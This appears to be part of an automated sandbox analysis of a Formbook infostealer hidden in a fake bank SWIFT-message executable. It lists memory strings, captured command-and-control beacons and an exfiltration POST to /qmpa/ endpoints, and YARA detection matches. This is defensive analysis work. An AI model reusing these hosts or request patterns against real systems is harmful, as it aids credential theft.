Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/P
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301083951.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300913114.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/S
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302865321.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302414369.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302326537.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302564228.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302653539.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302751937.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302492163.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302803561.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302242022.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302950130.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0P
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301083951.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/l
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300913114.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/l
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301083951.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302146273.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301888455.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.302077028.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301987162.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/ry
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301083951.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301779924.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301567715.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301491988.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301677692.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301216806.000000000600D000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301157376.000000000600D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/x
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300403427.0000000006034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.monotype.
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297293605.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297563125.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297534420.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297455873.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297323577.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297563125.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297534420.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297455873.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comU
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297293605.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297323577.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comegr
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297615331.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297563125.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297590159.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297534420.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297455873.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comegrjJH
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297563125.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297590159.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297534420.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297455873.000000000601B000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.297323577.000000000601B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comers0J
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301976081.0000000006044000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.301878220.0000000006043000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.comP1
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.300487990.0000000006016000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: systray.exe, 0000000A.00000002.564786967.0000000004FFA000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000A.00000002.565197079.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vodien.com/
Source: systray.exe, 0000000A.00000002.564786967.0000000004FFA000.00000004.10000000.00040000.00000000.sdmp, systray.exe, 0000000A.00000002.565197079.0000000006EB0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.vodien.com/singapore-email-hosting.php
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299882505.0000000006033000.00000004.00000800.00020000.00000000.sdmp, Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000002.336589275.00000000072C2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299882505.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cnV
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299882505.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe, 00000002.00000003.299882505.0000000006033000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cno.z
Source: q3W1-4699.10.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: q3W1-4699.10.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: q3W1-4699.10.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: systray.exe, 0000000A.00000003.530735455.0000000000915000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: q3W1-4699.10.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: systray.exe, 0000000A.00000003.530735455.0000000000915000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: systray.exe, 0000000A.00000003.530735455.0000000000915000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: systray.exe, 0000000A.00000003.530735455.0000000000915000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: systray.exe, 0000000A.00000003.530735455.0000000000915000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.dr String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: systray.exe, 0000000A.00000003.530735455.0000000000915000.00000004.00000020.00020000.00000000.sdmp, q3W1-4699.10.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /qmpa/ HTTP/1.1Host: www.multimediapages.comConnection: closeContent-Length: 188Cache-Control: no-cacheOrigin: http://www.multimediapages.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.multimediapages.com/qmpa/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 6d 52 68 34 6c 72 3d 6d 63 4c 7a 7a 6c 6c 51 57 77 75 6a 4d 66 4c 6f 52 70 77 35 65 38 31 69 78 38 6d 58 62 51 5a 4c 73 6e 4b 42 38 44 67 6b 55 49 61 68 7a 49 4e 62 6e 6d 30 59 79 36 4e 37 54 33 76 33 72 6d 6a 76 4f 51 46 68 31 6d 33 6f 76 73 4f 62 52 57 69 70 78 6d 37 42 4a 65 6d 4c 79 44 61 4f 34 47 6a 5a 70 43 75 66 75 35 76 6e 6c 6f 37 78 30 70 79 2d 46 48 63 41 49 30 37 47 71 70 72 4a 54 36 4c 38 55 5f 45 6e 51 5f 28 48 66 38 64 59 50 71 62 30 78 31 7e 62 55 79 6f 4b 33 4e 37 6e 65 30 72 50 59 77 58 4c 45 4f 6b 50 39 51 71 56 47 51 6c 44 6f 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: mRh4lr=mcLzzllQWwujMfLoRpw5e81ix8mXbQZLsnKB8DgkUIahzINbnm0Yy6N7T3v3rmjvOQFh1m3ovsObRWipxm7BJemLyDaO4GjZpCufu5vnlo7x0py-FHcAI07GqprJT6L8U_EnQ_(Hf8dYPqb0x1~bUyoK3N7ne0rPYwXLEOkP9QqVGQlDow).
Source: unknown DNS traffic detected: queries for: www.notarpucarhr.com
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73ehw8miGBWwdljwfXw==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.notarpucarhr.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61ftArfg9GGH4Fupqg==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.multimediapages.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /qmpa/?mRh4lr=5Yvs1mt+8koK04wDmvle7hFJkaWhy6okw1CCpgEhtGW9Nwizn2cFt5qaMIq71RWOXG0+Z4ku5zJzPR6AZImqbF2d7jI61SlZkw==&VrWd=-Z5PLbzhUhYhR8K HTTP/1.1Host: www.oaksinstitute.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

barindex
Source: Yara match File source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.31854c4.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.3169a9c.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables potentially checking for WinJail sandbox window Author: ditekSHen
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.451409709.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.562531717.0000000000ED0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.413620011.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.388632949.000000000DEDE000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Ziraat Bankasi Swift Mesaji20221129-34221.exe PID: 1308, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: systray.exe PID: 1312, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Ziraat Bankasi Swift Mesaji20221129-34221.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.31854c4.1.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 2.2.Ziraat Bankasi Swift Mesaji20221129-34221.exe.3169a9c.0.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_Anti_OldCopyPaste author = ditekSHen, description = Detects executables potentially checking for WinJail sandbox window
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.560048415.0000000000820000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.559572185.00000000003C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.450620046.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
